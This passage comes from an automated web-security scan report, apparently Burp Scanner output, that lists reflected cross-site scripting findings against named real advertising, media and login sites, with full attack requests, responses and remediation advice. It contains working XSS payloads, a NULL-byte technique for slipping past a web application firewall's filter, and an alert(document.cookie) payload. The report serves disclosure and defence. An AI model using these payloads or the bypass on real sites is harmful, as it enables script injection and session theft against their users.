rl%253D59608"%3balert(1)//758f25329e2 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303242819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fdork%2Fxss%2Fstored-reflected-xss-sql-injection-reputationcom.html&dt=1303224864012&bpp=3&shv=r20110414&jsv=r20110412&correlator=1303224864124&frm=0&adk=1607234649&ga_vid=1414392798.1303224865&ga_sid=1303224865&ga_hid=1469206436&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1317&bih=1003&fu=0&ifi=1&dtd=508&xpc=H1SUBNINVm&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 14:54:42 GMT
Server: Apache
Last-Modified: Wed, 09 Feb 2011 17:18:36 GMT
ETag: "69ef39-c38-49bdca7baf300"
Accept-Ranges: bytes
Content-Length: 5892
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mpck_encode = "rover.ebay.com%2Frover%2F1%2F3484-119769-15222-231%2F15%3Fmpt%3D1041069426%26siteid%3D0%26adid%3D462001%26fcid%3D462001%26so_ustat%3D4%26ir_DAP_I131%
...[SNIP]...
VjdGVkLXhzcy1zcWwtaW5qZWN0aW9uLXJlcHV0YXRpb25jb20uaHRtbLgCGMgC6_TPDKgDAdEDHROmdxAz1pjoA6YD6AMF9QMAAADE%26num%3D1%26sig%3DAGiWqtzwxnWJMgCOmYGbqZNq2knEzeN17g%26client%3Dca-pub-4063878933780912%26adurl%3D59608";alert(1)//758f25329e2http://"+mpck_encode+"\">
...[SNIP]...

3.250. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7779"-alert(1)-"ca5dadfbf4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=42457&type=lead&f7779"-alert(1)-"ca5dadfbf4a=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: imp.fetchback.com
Cookie: cmp=1_1299095619; uid=1_1299095619_1299095619157:6828272180648290; kwd=1_1299095619; sit=1_1299095619_3289:0:0; cre=1_1299095619; bpd=1_1299095619_h9km:0; apd=1_1299095619; scg=1_1299095619; ppd=1_1299095619; afl=1_1299095619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 02:16:58 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1303179418_1299095619157:6828272180648290; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:16:58 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 19 Apr 2011 02:16:58 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 233

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=42457&type=lead&f7779"-alert(1)-"ca5dadfbf4a=1' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

3.251. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e663"-alert(1)-"84ad3df84ce was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=42457&type=lead7e663"-alert(1)-"84ad3df84ce HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: imp.fetchback.com
Cookie: cmp=1_1299095619; uid=1_1299095619_1299095619157:6828272180648290; kwd=1_1299095619; sit=1_1299095619_3289:0:0; cre=1_1299095619; bpd=1_1299095619_h9km:0; apd=1_1299095619; scg=1_1299095619; ppd=1_1299095619; afl=1_1299095619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 02:16:21 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1303179381_1299095619157:6828272180648290; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:16:21 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 19 Apr 2011 02:16:21 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 230

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=42457&type=lead7e663"-alert(1)-"84ad3df84ce' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

3.252. http://insider.espn.go.com/mlb/blog [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://insider.espn.go.com
Path:   /mlb/blog

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a47a"><script>alert(1)</script>c61540aaab8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /mlb/blog?name=stark_jayson&id=6154671&3a47a"><script>alert(1)</script>c61540aaab8=1 HTTP/1.1
Host: insider.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:13:25 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: EGW06
Set-Cookie: SWID=6E9C9082-DD07-42E9-8207-8AAC74C9B6A1; path=/; expires=Sat, 26-Feb-2031 02:13:25 GMT; domain=.go.com;
Cache-Expires: Sat, 26 Feb 2011 02:18:25 GMT
Content-Length: 63928
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; expires=Tue, 08 Mar 2011 02:13:25 GMT; Path=/; Domain=.go.com
Connection: close
Via: 8810-05/06
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="?name=stark_jayson&amp;id=6154671&amp;3a47a"><script>alert(1)</script>c61540aaab8=1&amp;action=login&amp;appRedirect=http://insider.espn.go.com/mlb/blog?name=stark_jayson&id=6154671&3a47a">
...[SNIP]...

3.253. http://int.teracent.net/tase/int [PartNumber parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The value of the PartNumber request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4de63"><script>alert(1)</script>8ed7d96827 was submitted in the PartNumber parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/int?adv=150&fmt=html&sec=0&pid=prod&version=2&tier1=Accessories&tier2=Sunglasses&PartNumber=4de63"><script>alert(1)</script>8ed7d96827&url=http%3A//www.coach.com/online/handbags/-accessories_sunglasses-10551-10051-5000000000000013515-en%3Ft1Id%3D68%26t2Id%3D5000000000000013515%26tier%3D2%26langId%3D-1%26storeId%3D10551%26storeId%3D10551%26catalogId%3D10051%26cid%3DPPGL0055%26bannerCode%3DPPGL0055%26viewTaskName%3DCOABannerCodeDirectorCmd&rnd=741126674693077.8 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.coach.com/online/handbags/-accessories_sunglasses-10551-10051-5000000000000013515-en?t1Id=68&t2Id=5000000000000013515&tier=2&langId=-1&storeId=10551&storeId=10551&catalogId=10051&cid=PPGL0055&bannerCode=PPGL0055&viewTaskName=COABannerCodeDirectorCmd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=Mwf8VEP.X2PRIV; imp=a$150#1303349107011_23701916_as2101_imp|le#1303349107011_23701916_as2101_imp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p150r=b$u-84#A.7Oy|c-t1_3X0PNEA9Ju0#2.7Oy|c-t2_3jnoWyampnx#2.7Oy|i-4de63"><script>alert(1)</script>8ed7d96827#1.7Oy|; Domain=.teracent.net; Expires=Tue, 18-Oct-2011 01:41:42 GMT; Path=/
Set-Cookie: imp=a$le#1303350102507_32482849_ap2102_int|150#1303349107011_23701916_as2101_imp|; Domain=.teracent.net; Expires=Tue, 18-Oct-2011 01:41:42 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 21 Apr 2011 01:41:42 GMT
Connection: close
Content-Length: 538

<html><head></head><body>
<img src="https://ad.yieldmanager.com/pixel?id=595473&t=2" width="0" height="0" border="0" alt=""/><img src="https://coh.netmng.com/pixel/?aid=128&tax=Accessories/Sunglasses/4de63"><script>alert(1)</script>8ed7d96827" width="1" height="1" border="0" />
...[SNIP]...

3.254. http://int.teracent.net/tase/int [tier1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The value of the tier1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f028"><script>alert(1)</script>70df8c47823 was submitted in the tier1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/int?adv=150&fmt=html&sec=0&pid=prod&version=2&tier1=Accessories8f028"><script>alert(1)</script>70df8c47823&tier2=Sunglasses&PartNumber=&url=http%3A//www.coach.com/online/handbags/-accessories_sunglasses-10551-10051-5000000000000013515-en%3Ft1Id%3D68%26t2Id%3D5000000000000013515%26tier%3D2%26langId%3D-1%26storeId%3D10551%26storeId%3D10551%26catalogId%3D10051%26cid%3DPPGL0055%26bannerCode%3DPPGL0055%26viewTaskName%3DCOABannerCodeDirectorCmd&rnd=741126674693077.8 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.coach.com/online/handbags/-accessories_sunglasses-10551-10051-5000000000000013515-en?t1Id=68&t2Id=5000000000000013515&tier=2&langId=-1&storeId=10551&storeId=10551&catalogId=10051&cid=PPGL0055&bannerCode=PPGL0055&viewTaskName=COABannerCodeDirectorCmd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=Mwf8VEP.X2PRIV; imp=a$150#1303349107011_23701916_as2101_imp|le#1303349107011_23701916_as2101_imp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p150r=b$u-84#A.7Oy|c-t1_3X0PNEA9Ju0#1.7Oy|c-t2_3jnoWyampnx#1.7Oy|; Domain=.teracent.net; Expires=Tue, 18-Oct-2011 01:41:42 GMT; Path=/
Set-Cookie: imp=a$le#1303350102130_32426742_ap2105_int|150#1303349107011_23701916_as2101_imp|; Domain=.teracent.net; Expires=Tue, 18-Oct-2011 01:41:42 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 21 Apr 2011 01:41:41 GMT
Connection: close
Content-Length: 539

<html><head></head><body>
<img src="https://ad.yieldmanager.com/pixel?id=595473&t=2" width="0" height="0" border="0" alt=""/><img src="https://coh.netmng.com/pixel/?aid=128&tax=Accessories8f028"><script>alert(1)</script>70df8c47823/Sunglasses/" width="1" height="1" border="0" />
...[SNIP]...

3.255. http://int.teracent.net/tase/int [tier2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The value of the tier2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f755c"><script>alert(1)</script>65f0b1025fc was submitted in the tier2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/int?adv=150&fmt=html&sec=0&pid=prod&version=2&tier1=Accessories&tier2=Sunglassesf755c"><script>alert(1)</script>65f0b1025fc&PartNumber=&url=http%3A//www.coach.com/online/handbags/-accessories_sunglasses-10551-10051-5000000000000013515-en%3Ft1Id%3D68%26t2Id%3D5000000000000013515%26tier%3D2%26langId%3D-1%26storeId%3D10551%26storeId%3D10551%26catalogId%3D10051%26cid%3DPPGL0055%26bannerCode%3DPPGL0055%26viewTaskName%3DCOABannerCodeDirectorCmd&rnd=741126674693077.8 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.coach.com/online/handbags/-accessories_sunglasses-10551-10051-5000000000000013515-en?t1Id=68&t2Id=5000000000000013515&tier=2&langId=-1&storeId=10551&storeId=10551&catalogId=10051&cid=PPGL0055&bannerCode=PPGL0055&viewTaskName=COABannerCodeDirectorCmd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=Mwf8VEP.X2PRIV; imp=a$150#1303349107011_23701916_as2101_imp|le#1303349107011_23701916_as2101_imp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p150r=b$u-84#A.7Oy|c-t1_3X0PNEA9Ju0#2.7Oy|c-t2_3jnoWyampnx#1.7Oy|; Domain=.teracent.net; Expires=Tue, 18-Oct-2011 01:41:42 GMT; Path=/
Set-Cookie: imp=a$le#1303350102303_32483167_ap2100_int|150#1303349107011_23701916_as2101_imp|; Domain=.teracent.net; Expires=Tue, 18-Oct-2011 01:41:42 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 21 Apr 2011 01:41:42 GMT
Connection: close
Content-Length: 539

<html><head></head><body>
<img src="https://ad.yieldmanager.com/pixel?id=595473&t=2" width="0" height="0" border="0" alt=""/><img src="https://coh.netmng.com/pixel/?aid=128&tax=Accessories/Sunglassesf755c"><script>alert(1)</script>65f0b1025fc/" width="1" height="1" border="0" />
...[SNIP]...

3.256. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload cf10e<script>alert(1)</script>8303423482d was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G07608cf10e<script>alert(1)</script>8303423482d HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout; NETOPTOUT=true; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6m1V1Ju34wt0NSA6Qb/nOtMHg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 19 Apr 2011 16:04:52 GMT
Cache-Control: max-age=86400, private
Expires: Wed, 20 Apr 2011 16:04:52 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 19 Apr 2011 16:04:52 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G07608CF10E<SCRIPT>ALERT(1)</SCRIPT>8303423482D" was not recognized.
*/

3.257. https://login.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://login.barracudanetworks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00185a3"><a>0b39656ae9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 185a3"><a>0b39656ae9 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?%00185a3"><a>0b39656ae9=1 HTTP/1.1
Host: login.barracudanetworks.com
Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php?40caf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E570f923664=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91832325.1298729756.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=91832325.720058028.1298729756.1298729756.1298729756.1; __utmc=91832325; __utmb=91832325.7.10.1298729756

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 14:38:30 GMT
Server: Apache
Set-Cookie: CLOUD_LOCALE=en_US; expires=Thu, 25-Aug-2011 14:38:30 GMT; path=/; domain=.barracudanetworks.com
Set-Cookie: cloud_session=0mbv4o4u95latiga7u03i7e414; path=/; domain=.barracudanetworks.com
Expires: Fri, 26 Feb 2010 09:38:30 -0500
Cache-Control: no-store
Pragma: no-cache
Set-Cookie: cloud_session=0mbv4o4u95latiga7u03i7e414; path=/; domain=.barracudanetworks.com
X-Cloud-Auth: 0
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 5832

<!DOCTYPE html>
<!-- Portal Version 11.02 29121 -->
<html>
   <head>
       <meta charset="UTF-8">
       <meta http-equiv="Content-Version" content="1.1.0">
       <title>Sign In > Barracuda Networks</title>
       
       <li
...[SNIP]...
<a href="/new_account/?service=https://login.barracudanetworks.com/?%00185a3"><a>0b39656ae9=1">
...[SNIP]...

3.258. http://mf.sitescout.com/tag.jsp [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66e3a'%3balert(1)//54509da0ddf was submitted in the h parameter. This input was echoed as 66e3a';alert(1)//54509da0ddf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0384790&w=300&h=25066e3a'%3balert(1)//54509da0ddf&rnd=1298497076&cm=http://ib.adnxs.com/click/8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAQMCAAUAAAAAuiTYFwAAAAA./cnd=!jhrt-AiyggMQ-KsMGAAg8fgCKAAx8BZIUPz4CkBCEwgAEAAYACABKP7__________wFCDgjIPhCLlCkYmxMgAigFSANQAFj-A2ADaOYC/referrer=http%3A%2F%2Fc5.zedo.com%2Fjsc%2Fc5%2Fff2.html%3Fn%3D305%3Bc%3D5852%2F749%2F1%3Bs%3D421%3Bd%3D9%3Bw%3D300%3Bh%3D250/clickenc=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%253Fa%253D895737%253Bx%253D2304%253Bg%253D172%253Bc%253D305005852%252C305005852%253Bi%253D0%253Bn%253D305%253Bi%253D0%253Bu%253DjhmxpQoBADYAAET%40BzgAAAAW%257E022111%253B1%253D8%253B2%253D1%253Be%253Di%253Bs%253D421%253Bg%253D172%253Bw%253D47%253Bm%253D82%253Bz%253D0.2778043581638485%253Bp%253D8%253Bf%253D1093076%253Bh%253D1093075%253Bo%253D20%253By%253D331%253Bv%253D1%253Bt%253Di%253Bk%3D HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQs1NVosnvNv2i6g_Cj40fmVNAAAAALkOBgBmAQAAZgEAAAIAAAD4FQMAcbwAAAEAAABVU0QAVVNEACwB-gD-AQAA_gYAAgMCAAUAAAAAuyTpFwAAAAA.&pubclick=http://xads.zedo.com/ads2/c%253Fa%253D895737%253Bx%253D2304%253Bg%253D172%253Bc%253D305005852%252C305005852%253Bi%253D0%253Bn%253D305%253Bi%253D0%253Bu%253DjhmxpQoBADYAAET@BzgAAAAW%257E022111%253B1%253D8%253B2%253D1%253Be%253Di%253Bs%253D421%253Bg%253D172%253Bw%253D47%253Bm%253D82%253Bz%253D0.2778043581638485%253Bp%253D8%253Bf%253D1093076%253Bh%253D1093075%253Bo%253D20%253By%253D331%253Bv%253D1%253Bt%253Di%253Bk%3D&udj=uf%28%27a%27%2C+577%2C+1298497076%29%3Buf%28%27r%27%2C+202232%2C+1298497076%29%3B&cnd=!jhrt-AiyggMQ-KsMGAAg8fgCKAAx8BZIUPz4CkBCEwgAEAAYACABKP7__________wFCDgjIPhCLlCkYmxMgAigFSANQAFj-A2ADaOYC&referrer=http://c5.zedo.com/jsc/c5/ff2.html%3Fn=305%3Bc=5852/749/1%3Bs=421%3Bd=9%3Bw=300%3Bh=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 1436
Date: Wed, 23 Feb 2011 21:40:39 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://mf.sitescout.com/disp?pid=0384790&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQ
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="25066e3a';alert(1)//54509da0ddf" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.259. http://mf.sitescout.com/tag.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9c45"%3balert(1)//f523be3e8b3 was submitted in the pid parameter. This input was echoed as e9c45";alert(1)//f523be3e8b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

